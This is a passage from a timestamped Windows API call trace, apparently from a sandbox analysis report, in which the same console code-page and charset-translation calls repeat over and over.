0xcb [0044.216] GetConsoleOutputCP () returned 0x1b5 [0044.228] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb20) returned 0 [0044.228] GetLastError () returned 0xcb [0044.228] GetConsoleOutputCP () returned 0x1b5 [0044.228] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.229] GetLastError () returned 0xcb [0044.229] GetConsoleOutputCP () returned 0x1b5 [0044.229] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.229] GetLastError () returned 0xcb [0044.229] GetConsoleOutputCP () returned 0x1b5 [0044.229] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.229] GetLastError () returned 0xcb [0044.229] GetConsoleOutputCP () returned 0x1b5 [0044.229] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.229] GetLastError () returned 0xcb [0044.229] GetConsoleOutputCP () returned 0x1b5 [0044.229] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.229] GetLastError () returned 0xcb [0044.229] GetConsoleOutputCP () returned 0x1b5 [0044.229] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.229] GetLastError () returned 0xcb [0044.230] GetConsoleOutputCP () returned 0x1b5 [0044.230] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.230] GetLastError () returned 0xcb [0044.230] GetConsoleOutputCP () returned 0x1b5 [0044.230] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.230] GetLastError () returned 0xcb [0044.230] GetConsoleOutputCP () returned 0x1b5 [0044.230] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.230] GetLastError () returned 0xcb [0044.230] GetConsoleOutputCP () returned 0x1b5 [0044.230] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.230] GetLastError () returned 0xcb [0044.230] GetConsoleOutputCP () returned 0x1b5 [0044.230] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.230] GetLastError () returned 0xcb [0044.231] GetConsoleOutputCP () returned 0x1b5 [0044.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.231] GetLastError () returned 0xcb [0044.231] GetConsoleOutputCP () returned 0x1b5 [0044.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.231] GetLastError () returned 0xcb [0044.231] GetConsoleOutputCP () returned 0x1b5 [0044.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.231] GetLastError () returned 0xcb [0044.231] GetConsoleOutputCP () returned 0x1b5 [0044.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.231] GetLastError () returned 0xcb [0044.231] GetConsoleOutputCP () returned 0x1b5 [0044.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.231] GetLastError () returned 0xcb [0044.231] GetConsoleOutputCP () returned 0x1b5 [0044.231] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.232] GetLastError () returned 0xcb [0044.232] GetConsoleOutputCP () returned 0x1b5 [0044.232] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.232] GetLastError () returned 0xcb [0044.232] GetConsoleOutputCP () returned 0x1b5 [0044.232] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.232] GetLastError () returned 0xcb [0044.232] GetConsoleOutputCP () returned 0x1b5 [0044.232] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.232] GetLastError () returned 0xcb [0044.232] GetConsoleOutputCP () returned 0x1b5 [0044.232] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.232] GetLastError () returned 0xcb [0044.232] GetConsoleOutputCP () returned 0x1b5 [0044.232] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.232] GetLastError () returned 0xcb [0044.232] GetConsoleOutputCP () returned 0x1b5 [0044.232] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.233] GetLastError () returned 0xcb [0044.233] GetConsoleOutputCP () returned 0x1b5 [0044.233] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.233] GetLastError () returned 0xcb [0044.233] GetConsoleOutputCP () returned 0x1b5 [0044.233] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.233] GetLastError () returned 0xcb [0044.233] GetConsoleOutputCP () returned 0x1b5 [0044.233] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.233] GetLastError () returned 0xcb [0044.233] GetConsoleOutputCP () returned 0x1b5 [0044.233] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.233] GetLastError () returned 0xcb [0044.233] GetConsoleOutputCP () returned 0x1b5 [0044.233] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.233] GetLastError () returned 0xcb [0044.233] GetConsoleOutputCP () returned 0x1b5 [0044.234] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.234] GetLastError () returned 0xcb [0044.234] GetConsoleOutputCP () returned 0x1b5 [0044.234] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.234] GetLastError () returned 0xcb [0044.234] GetConsoleOutputCP () returned 0x1b5 [0044.234] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.234] GetLastError () returned 0xcb [0044.234] GetConsoleOutputCP () returned 0x1b5 [0044.234] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.234] GetLastError () returned 0xcb [0044.234] GetConsoleOutputCP () returned 0x1b5 [0044.234] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.234] GetLastError () returned 0xcb [0044.234] GetConsoleOutputCP () returned 0x1b5 [0044.234] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.234] GetLastError () returned 0xcb [0044.234] GetConsoleOutputCP () returned 0x1b5 [0044.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.235] GetLastError () returned 0xcb [0044.235] GetConsoleOutputCP () returned 0x1b5 [0044.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.235] GetLastError () returned 0xcb [0044.235] GetConsoleOutputCP () returned 0x1b5 [0044.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.235] GetLastError () returned 0xcb [0044.235] GetConsoleOutputCP () returned 0x1b5 [0044.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.235] GetLastError () returned 0xcb [0044.235] GetConsoleOutputCP () returned 0x1b5 [0044.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.235] GetLastError () returned 0xcb [0044.235] GetConsoleOutputCP () returned 0x1b5 [0044.235] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.235] GetLastError () returned 0xcb [0044.235] GetConsoleOutputCP () returned 0x1b5 [0044.236] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.236] GetLastError () returned 0xcb [0044.236] GetConsoleOutputCP () returned 0x1b5 [0044.236] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.236] GetLastError () returned 0xcb [0044.236] GetConsoleOutputCP () returned 0x1b5 [0044.236] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.236] GetLastError () returned 0xcb [0044.236] GetConsoleOutputCP () returned 0x1b5 [0044.236] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.236] GetLastError () returned 0xcb [0044.236] GetConsoleOutputCP () returned 0x1b5 [0044.236] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.236] GetLastError () returned 0xcb [0044.236] GetConsoleOutputCP () returned 0x1b5 [0044.236] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.236] GetLastError () returned 0xcb [0044.237] GetConsoleOutputCP () returned 0x1b5 [0044.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.237] GetLastError () returned 0xcb [0044.237] GetConsoleOutputCP () returned 0x1b5 [0044.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.237] GetLastError () returned 0xcb [0044.237] GetConsoleOutputCP () returned 0x1b5 [0044.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.237] GetLastError () returned 0xcb [0044.237] GetConsoleOutputCP () returned 0x1b5 [0044.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.237] GetLastError () returned 0xcb [0044.237] GetConsoleOutputCP () returned 0x1b5 [0044.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.237] GetLastError () returned 0xcb [0044.237] GetConsoleOutputCP () returned 0x1b5 [0044.237] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.237] GetLastError () returned 0xcb [0044.238] GetConsoleOutputCP () returned 0x1b5 [0044.238] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.238] GetLastError () returned 0xcb [0044.238] GetConsoleOutputCP () returned 0x1b5 [0044.238] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.238] GetLastError () returned 0xcb [0044.238] GetConsoleOutputCP () returned 0x1b5 [0044.238] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.238] GetLastError () returned 0xcb [0044.238] GetConsoleOutputCP () returned 0x1b5 [0044.238] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.238] GetLastError () returned 0xcb [0044.238] GetConsoleOutputCP () returned 0x1b5 [0044.239] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.239] GetLastError () returned 0xcb [0044.239] GetConsoleOutputCP () returned 0x1b5 [0044.239] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.239] GetLastError () returned 0xcb [0044.239] GetConsoleOutputCP () returned 0x1b5 [0044.239] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.239] GetLastError () returned 0xcb [0044.239] GetConsoleOutputCP () returned 0x1b5 [0044.239] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.239] GetLastError () returned 0xcb [0044.239] GetConsoleOutputCP () returned 0x1b5 [0044.239] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.239] GetLastError () returned 0xcb [0044.239] GetConsoleOutputCP () returned 0x1b5 [0044.240] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.240] GetLastError () returned 0xcb [0044.240] GetConsoleOutputCP () returned 0x1b5 [0044.240] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.240] GetLastError () returned 0xcb [0044.240] GetConsoleOutputCP () returned 0x1b5 [0044.240] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.240] GetLastError () returned 0xcb [0044.240] GetConsoleOutputCP () returned 0x1b5 [0044.240] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.240] GetLastError () returned 0xcb [0044.240] GetConsoleOutputCP () returned 0x1b5 [0044.240] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.240] GetLastError () returned 0xcb [0044.240] GetConsoleOutputCP () returned 0x1b5 [0044.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.241] GetLastError () returned 0xcb [0044.241] GetConsoleOutputCP () returned 0x1b5 [0044.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.241] GetLastError () returned 0xcb [0044.241] GetConsoleOutputCP () returned 0x1b5 [0044.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.241] GetLastError () returned 0xcb [0044.241] GetConsoleOutputCP () returned 0x1b5 [0044.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.241] GetLastError () returned 0xcb [0044.241] GetConsoleOutputCP () returned 0x1b5 [0044.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.241] GetLastError () returned 0xcb [0044.241] GetConsoleOutputCP () returned 0x1b5 [0044.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.241] GetLastError () returned 0xcb [0044.241] GetConsoleOutputCP () returned 0x1b5 [0044.241] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.242] GetLastError () returned 0xcb [0044.242] GetConsoleOutputCP () returned 0x1b5 [0044.242] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.242] GetLastError () returned 0xcb [0044.242] GetConsoleOutputCP () returned 0x1b5 [0044.242] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.242] GetLastError () returned 0xcb [0044.242] GetConsoleOutputCP () returned 0x1b5 [0044.242] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.242] GetLastError () returned 0xcb [0044.242] GetConsoleOutputCP () returned 0x1b5 [0044.242] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.242] GetLastError () returned 0xcb [0044.242] GetConsoleOutputCP () returned 0x1b5 [0044.242] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.242] GetLastError () returned 0xcb [0044.242] GetConsoleOutputCP () returned 0x1b5 [0044.242] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.242] GetLastError () returned 0xcb [0044.242] GetConsoleOutputCP () returned 0x1b5 [0044.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb20) returned 0 [0044.243] GetLastError () returned 0xcb [0044.243] GetConsoleOutputCP () returned 0x1b5 [0044.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.243] GetLastError () returned 0xcb [0044.243] GetConsoleOutputCP () returned 0x1b5 [0044.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.243] GetLastError () returned 0xcb [0044.243] GetConsoleOutputCP () returned 0x1b5 [0044.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.243] GetLastError () returned 0xcb [0044.243] GetConsoleOutputCP () returned 0x1b5 [0044.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.243] GetLastError () returned 0xcb [0044.243] GetConsoleOutputCP () returned 0x1b5 [0044.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.243] GetLastError () returned 0xcb [0044.243] GetConsoleOutputCP () returned 0x1b5 [0044.243] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.243] GetLastError () returned 0xcb [0044.243] GetConsoleOutputCP () returned 0x1b5 [0044.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.244] GetLastError () returned 0xcb [0044.244] GetConsoleOutputCP () returned 0x1b5 [0044.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.244] GetLastError () returned 0xcb [0044.244] GetConsoleOutputCP () returned 0x1b5 [0044.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.244] GetLastError () returned 0xcb [0044.244] GetConsoleOutputCP () returned 0x1b5 [0044.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.244] GetLastError () returned 0xcb [0044.244] GetConsoleOutputCP () returned 0x1b5 [0044.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.244] GetLastError () returned 0xcb [0044.244] GetConsoleOutputCP () returned 0x1b5 [0044.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.244] GetLastError () returned 0xcb [0044.244] GetConsoleOutputCP () returned 0x1b5 [0044.244] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.244] GetLastError () returned 0xcb [0044.244] GetConsoleOutputCP () returned 0x1b5 [0044.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.245] GetLastError () returned 0xcb [0044.245] GetConsoleOutputCP () returned 0x1b5 [0044.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.245] GetLastError () returned 0xcb [0044.245] GetConsoleOutputCP () returned 0x1b5 [0044.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.245] GetLastError () returned 0xcb [0044.245] GetConsoleOutputCP () returned 0x1b5 [0044.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.245] GetLastError () returned 0xcb [0044.245] GetConsoleOutputCP () returned 0x1b5 [0044.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.245] GetLastError () returned 0xcb [0044.245] GetConsoleOutputCP () returned 0x1b5 [0044.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.245] GetLastError () returned 0xcb [0044.245] GetConsoleOutputCP () returned 0x1b5 [0044.245] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.245] GetLastError () returned 0xcb [0044.245] GetConsoleOutputCP () returned 0x1b5 [0044.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.246] GetLastError () returned 0xcb [0044.246] GetConsoleOutputCP () returned 0x1b5 [0044.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.246] GetLastError () returned 0xcb [0044.246] GetConsoleOutputCP () returned 0x1b5 [0044.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.246] GetLastError () returned 0xcb [0044.246] GetConsoleOutputCP () returned 0x1b5 [0044.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.246] GetLastError () returned 0xcb [0044.246] GetConsoleOutputCP () returned 0x1b5 [0044.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.246] GetLastError () returned 0xcb [0044.246] GetConsoleOutputCP () returned 0x1b5 [0044.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.246] GetLastError () returned 0xcb [0044.246] GetConsoleOutputCP () returned 0x1b5 [0044.246] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.246] GetLastError () returned 0xcb [0044.246] GetConsoleOutputCP () returned 0x1b5 [0044.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.247] GetLastError () returned 0xcb [0044.247] GetConsoleOutputCP () returned 0x1b5 [0044.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.247] GetLastError () returned 0xcb [0044.247] GetConsoleOutputCP () returned 0x1b5 [0044.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.247] GetLastError () returned 0xcb [0044.247] GetConsoleOutputCP () returned 0x1b5 [0044.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.247] GetLastError () returned 0xcb [0044.247] GetConsoleOutputCP () returned 0x1b5 [0044.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.247] GetLastError () returned 0xcb [0044.247] GetConsoleOutputCP () returned 0x1b5 [0044.247] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, 